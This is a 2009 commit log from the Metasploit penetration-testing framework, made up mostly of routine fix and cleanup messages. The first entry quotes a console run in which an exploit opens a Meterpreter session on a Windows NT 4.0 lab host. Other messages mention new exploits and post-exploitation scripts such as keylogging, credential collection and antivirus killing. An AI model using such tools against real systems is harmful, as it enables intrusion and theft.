HD Moore
aa09862813
Fixes #401. Ends up Windows NT doesn't like DCERPC requests to be partially written by SMB writes; this patches the min write size to be at least as big as the DCERPC request. The DCERPC::max_frag_size parameter can still be used for more evasion.
[*] Started reverse handler
[*] Detected a Windows NT 4.0 target
[*] Adjusting the SMB/DCERPC parameters for Windows NT
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.0.128[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.0.128[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.128:1485)
meterpreter > sysinfo
Computer: VMNT4
OS : Windows NT 4.0 (Build 1381, Service Pack 6).
Arch : x86
Language: en_US
git-svn-id: file:///home/svn/framework3/trunk@7296 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 16:37:18 +00:00
HD Moore
bffb98ba9f
Add XP SP3 target for WarFTPD.
git-svn-id: file:///home/svn/framework3/trunk@7295 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 10:29:41 +00:00
HD Moore
9141d4e967
Condense the lorcon2 each_packet method; the queue isn't necessary after testing
git-svn-id: file:///home/svn/framework3/trunk@7294 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 01:41:17 +00:00
HD Moore
31276e1626
Fixes #427. Finally found a solution that works for 1.8 and 1.9; this allows lorcon modules to run in the background or foreground and handle interrupts from the console gracefully. It's still a hack
git-svn-id: file:///home/svn/framework3/trunk@7293 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-28 00:19:17 +00:00
HD Moore
7b22b2cc04
Mostly working codebase, still hanging on some instances, depends on latest svn of lorcon2. See #427
git-svn-id: file:///home/svn/framework3/trunk@7292 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 20:13:20 +00:00
HD Moore
5234fe8ff8
Fixes 416. Adds the rm/del commands to meterpreter, fixes build problems triggered by the POSIX code merge
git-svn-id: file:///home/svn/framework3/trunk@7291 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 02:31:07 +00:00
HD Moore
276a3f8052
Use _WIN32 instead of __WIN32__ to be consistent
git-svn-id: file:///home/svn/framework3/trunk@7290 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 01:13:35 +00:00
HD Moore
6dcffd0373
Catch attempts to migrate to a name vs a pid
git-svn-id: file:///home/svn/framework3/trunk@7289 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 00:56:56 +00:00
HD Moore
8d8bc45dfd
Adds a shortcut for getting a shell: (execute -f cmd -c -i -H) is now just "shell"
git-svn-id: file:///home/svn/framework3/trunk@7288 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-27 00:47:00 +00:00
HD Moore
3b99a513ec
Fixes #352 and fixes #350. Can no longer reproduce memory corruption or packet loss with this code
git-svn-id: file:///home/svn/framework3/trunk@7287 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 22:49:43 +00:00
HD Moore
b662d044a6
Fixes #412. Still an issue with lorcon not yielding back when there is no traffic, but this is a different bug
git-svn-id: file:///home/svn/framework3/trunk@7286 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 22:36:24 +00:00
HD Moore
ddeb80e0da
See #412. Fix compile warnings and errors on 1.9, still needs testing
git-svn-id: file:///home/svn/framework3/trunk@7285 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 21:09:40 +00:00
HD Moore
e1559b1ab4
Fixes #408. Trims leading spaces, adds trailing space, prevents line wipe when tab completing is done
git-svn-id: file:///home/svn/framework3/trunk@7284 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 20:33:55 +00:00
HD Moore
5eed9deb2d
Adds the joomla TinyMCE file upload exploit from spinbad.
git-svn-id: file:///home/svn/framework3/trunk@7283 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 20:00:39 +00:00
HD Moore
5e137e92fd
Fixes #381. To scan for TLSv1-only services, set SSLVersion TLS1
git-svn-id: file:///home/svn/framework3/trunk@7282 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 19:48:15 +00:00
HD Moore
478a7ce8ab
Fixes #410. Calls the real _close function, not the best solution, but will do until we fix the IO::Stream override.
git-svn-id: file:///home/svn/framework3/trunk@7281 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 19:06:50 +00:00
HD Moore
91dd38550f
Fixes #398. Allow globals to override local defaults, but fall through to local defaults if no global or local is set
git-svn-id: file:///home/svn/framework3/trunk@7280 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 18:48:06 +00:00
HD Moore
bbb85ceb2c
Updated userguide and latex file to match copyright and links
git-svn-id: file:///home/svn/framework3/trunk@7279 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 18:04:49 +00:00
HD Moore
32f7d742b3
Fixes #328. Crafty little bug -- if asm was "" vs nil, the stage would try to compile as metasm instead of using the raw payload.
git-svn-id: file:///home/svn/framework3/trunk@7278 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 17:44:43 +00:00
HD Moore
e7638ef887
Fixes #397. Webrick requires :BindAddress but msfweb only passed in :Host; likely an API change was missed during a Rails upgrade.
git-svn-id: file:///home/svn/framework3/trunk@7277 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 17:33:05 +00:00
James Lee
0a6bb91cb9
keywords
git-svn-id: file:///home/svn/framework3/trunk@7276 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 15:14:28 +00:00
James Lee
127b5f8608
keywords, maybe?
git-svn-id: file:///home/svn/framework3/trunk@7275 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 15:12:05 +00:00
Mario Ceballos
3d3e031690
fixes ticket 419
git-svn-id: file:///home/svn/framework3/trunk@7274 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 11:21:23 +00:00
James Lee
232c218475
raise instead of return
git-svn-id: file:///home/svn/framework3/trunk@7273 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 06:02:14 +00:00
James Lee
cf25726236
killav usage
git-svn-id: file:///home/svn/framework3/trunk@7272 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 05:50:02 +00:00
James Lee
adece18fd5
keylogrecorder usage; spacing; don't try to migrate into the process we're currently running in
git-svn-id: file:///home/svn/framework3/trunk@7271 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 05:26:08 +00:00
James Lee
6e85ba4393
hostedit usage
git-svn-id: file:///home/svn/framework3/trunk@7270 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:56:55 +00:00
James Lee
198bf48735
gettelnet usage and spacing
git-svn-id: file:///home/svn/framework3/trunk@7269 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:49:01 +00:00
James Lee
bf48e39532
get_local_subnets usage
git-svn-id: file:///home/svn/framework3/trunk@7268 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:43:59 +00:00
James Lee
0a074b294f
getgui option parsing; usage; spacing
git-svn-id: file:///home/svn/framework3/trunk@7267 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:41:51 +00:00
HD Moore
7d7c565a37
Merge in the POSIX stdapi extension, still some work left to finish
git-svn-id: file:///home/svn/framework3/trunk@7266 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:34:20 +00:00
James Lee
1aa9d1b662
fix some spacing; better option parsing; don't write a file if we don't have to
git-svn-id: file:///home/svn/framework3/trunk@7265 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:33:53 +00:00
HD Moore
6da0013b91
See #378. Additional fix for batch mode
git-svn-id: file:///home/svn/framework3/trunk@7264 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 03:54:44 +00:00
HD Moore
8328bf654b
Fixes #358. Adds progress reporting at 10% intervals (min granularity is thread count)
git-svn-id: file:///home/svn/framework3/trunk@7263 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 03:49:07 +00:00
et
7a24a5495e
Fix #414. Globally defined datastore values are now rewritten before RHOSTS, RPORT, SSL are set. Support for hostnames instead of IPs. Minor version changes
git-svn-id: file:///home/svn/framework3/trunk@7262 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 22:20:59 +00:00
HD Moore
6dfaaef295
Remove the bogus puts()
git-svn-id: file:///home/svn/framework3/trunk@7261 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 21:55:59 +00:00
Mario Ceballos
131adc4c3a
fixed CVE reference number.
git-svn-id: file:///home/svn/framework3/trunk@7260 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 21:19:27 +00:00
James Lee
cadb1c9337
add -h and usage to get_local_subnets
git-svn-id: file:///home/svn/framework3/trunk@7259 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 21:03:42 +00:00
HD Moore
b0a38b1cfa
Fix bad uses of puts() and add raise Rex::Script::Completed where appropriate. These still need a major overhaul to fix tab indents and other problems
git-svn-id: file:///home/svn/framework3/trunk@7258 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 20:57:23 +00:00
HD Moore
f9f690b0e7
Updated prefetch script and creation of Rex::Script::Completed as a clean way to exit meterpreter scripts
git-svn-id: file:///home/svn/framework3/trunk@7257 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 20:50:07 +00:00
HD Moore
e94360f7cf
The script now downloads this as needed
git-svn-id: file:///home/svn/framework3/trunk@7256 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 20:47:16 +00:00
James Lee
e93995fdab
add -h to credcollect
git-svn-id: file:///home/svn/framework3/trunk@7255 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 19:52:40 +00:00
James Lee
5fd8dc748a
add -h and usage to checkvm
git-svn-id: file:///home/svn/framework3/trunk@7254 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:53:43 +00:00
James Lee
134c8d75d7
better option handling, beginnings of universal -h support
git-svn-id: file:///home/svn/framework3/trunk@7253 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:36:47 +00:00
James Lee
e836e6373a
add Id to scripts; remove shebang since they should never run from commandline
git-svn-id: file:///home/svn/framework3/trunk@7252 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:04:39 +00:00
James Lee
daed2d5d8f
spaces --> tabs
git-svn-id: file:///home/svn/framework3/trunk@7251 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:56:01 +00:00
James Lee
cdc042d49b
keywords
git-svn-id: file:///home/svn/framework3/trunk@7250 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:45:34 +00:00
James Lee
15f8538e1c
spaces --> tabs
git-svn-id: file:///home/svn/framework3/trunk@7249 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:44:53 +00:00
HD Moore
e3f68f2639
Another large number of warnings fixed by Yoann Guillot
git-svn-id: file:///home/svn/framework3/trunk@7248 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:18:23 +00:00
HD Moore
9904861e94
Prevent rails from overloading require, another big speed boost from Yoann, and it looks like we can avoid it
git-svn-id: file:///home/svn/framework3/trunk@7247 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:07:48 +00:00